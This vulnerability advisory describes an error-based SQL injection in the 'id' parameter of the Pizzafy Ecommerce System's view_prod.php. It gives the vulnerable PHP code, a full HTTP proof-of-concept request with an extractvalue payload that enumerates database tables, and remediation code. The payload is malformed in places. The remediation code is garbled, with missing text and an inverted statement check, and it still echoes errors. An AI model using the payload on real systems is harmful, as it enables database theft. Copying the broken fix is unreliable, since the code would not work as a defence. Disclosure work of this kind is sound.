# Vulnerability Summary: SQL Injection Vulnerability in Pizzafy Ecommerce System ## Vulnerability Overview * **Affected Version**: Pizzafy Ecommerce System 1.0 * **Vulnerability Type**: SQL Injection (Error-based) * **Severity**: HIGH * **Status**: Unpatched * **Vulnerable Endpoint**: `/pizzafy/view_prod.php?id=3` * **Description**: An error-based SQL injection vulnerability was identified in the `select` functionality. Due to the lack of proper sanitization of the `id` parameter and the `id` column, attackers can inject malicious SQL commands into backend database queries. ## Impact Scope * **Confidentiality**: Full disclosure of database schema and user credentials. * **Integrity**: Unauthorized deletion or modification of records. * **Availability**: Denial of service caused by large-scale data deletion. * **Privilege Escalation**: Session hijacking and administrative access via extraction of session data. ## Proof of Concept (PoC) **Vulnerable Code:** ```php $id = $_GET['id']; $query = $conn->query("SELECT * FROM product_list WHERE id = '$id'"); if (!$query) { echo $conn->error; exit; } ``` **Exploit Payload:** ```http GET /pizzafy/view_prod.php?id=9%20AND%20extractvalue(1,0xconcat(0x7e,(0x7e(SELECT%20table_name%20FROM%20information_schema.tables%20WHERE%20table_schema=database())%20LIMIT%200,1)))%20-- HTTP/1.1 Host: localhost sec-ch-ua: Accept: */* X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 1.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/pizzafy/index.php?page=home Accept-Encoding: gzip, deflate Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: __cfduid=d20b0de5062bc2723e98fba4b5ebec739eceeff8d585d86cb304bf6d87ec; PHPSESSID=... Connection: close ``` ## Remediation **Remediation Code:** ```php try { $id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT); if($id === false || $id === null || $id prepare("SELECT * FROM product_list WHERE id = ?"); if($stmt) { throw new Exception("Error."); } $stmt->bind_param("i", $id); $stmt->execute(); $result = $stmt->get_result(); if($result && $result->num_rows > 0){ $prod = $result->fetch_assoc(); } else { throw new Exception("Product not found."); } } catch (Exception $e) { error_log("Error: " . $e->getMessage() . " - ID: " . $id); echo $e->getMessage(); exit; } ``` **Mitigation Recommendations:** 1. **Use Prepared Statements**: Employ parameterized queries to prevent SQL injection. 2. **Input Validation**: Validate and sanitize the `id` parameter, allowing only expected values. 3. **Database Permissions**: Restrict database user privileges to limit the potential damage of SQL injection. 4. **Monitoring and Logging**: Track and alert on anomalous patterns, such as slow queries or repeated access attempts. 5. **Security Testing**: Conduct regular penetration testing and code reviews to identify and mitigate vulnerabilities. 6. **Error Handling**: Avoid exposing database-related errors in responses, as this may assist attackers.